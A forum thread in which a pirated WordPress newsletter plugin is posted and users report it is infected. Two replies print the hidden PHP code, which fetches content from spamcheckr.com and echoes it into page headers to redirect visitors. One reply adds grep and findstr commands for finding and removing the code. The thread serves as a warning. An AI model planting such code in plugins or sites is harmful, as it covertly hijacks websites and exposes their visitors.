MyMail – Email Newsletter Plugin for WordPress – V1.6.4.2

[pretheme-vip]

Demo :
http://codecanyon.net/item/mymail-email-...ew/3078294


Download Link:
http://Flagged as VIRUS SPAM SITE/3inainxvzruc/MyMail__Email_Newsletter_Plugin_for_WordPress__V1.6.4.2.rar.html

[modernians]

just found this in your files:
<?php if (mt_rand(0,99) == 1) {function sec1_check() {if(function_exists('curl_init')) {$url = "spamcheckr.com/req.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);cu​rl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec1_check');
}?>

This puts a redirect from time to time on your site to a youtube video!

Apart from that it's great!

[thithac]

this is infected!!

[softman77]

All Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip shares are infected!

[Worf]

Works fine, thank you :)

SignatureNewbie Tutorial to find infected Files (Local/Remote)

Magic Button :

You can check your folders by using a useful little command in the terminal if you have grep (default on macs and many others but not pc). For pc use findstr or download grep. If you don't have access to these files locally either download them or access them remotely with ssh/telnes
The grep command I use is:

PHP Code:

grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content 


(Don't forget to change /www/mysite/wp-content to the location of your wordpress site)
Using -nr options with grep it will output the exact line of the folder and file the code is on.

And for pc:

PHP Code:

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content 


Unfortunately it will probalby tell you it's on line one, but when you open the file you'll notice its a compressed file that is about 250 lines long. No problem though. Just open it with any text editor that has syntax highlighting turned on and look for this code:

PHP Code:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} 


It will be the only code that shows up highlighted while all other code will remain greyed out because it's only there to trick you and doesn't actually do anything.

You can then delete that code.
You might also want to check on who added the file in the first place so just use the same grep command that you used above but instead use the name of the file that you found the malicious code in. So if the file name is includes/settings.php run the following in the command line:

PHP Code:

grep -nr 'includes/settings.php' /www/mysite/wp-content 


Most likely the file was included in the main php script in the plugin root or theme functions.php.
It will look something like this

PHP Code:

include 'includes/settings.php'; 


You're safe to delete that line, if the file was all garbage code. I'd also look through that page to see if anything else was added that looks suspicious.
You're safest bet would be to discontinue from using the plugin entirely, but if you really need it you could run through some online virus checkers or just look through the plugin to be extra safe.

Most often these plugins come from sites like wplocker/themeok or other sites that claim they have premium plugins for free. Bottom line is, it's too good to be true and they want to rip you off so either pay for them or be ready for them to screw with you.
By the way it probably did other things beside that so I'd take several other security measures then just fixing the youtube hack.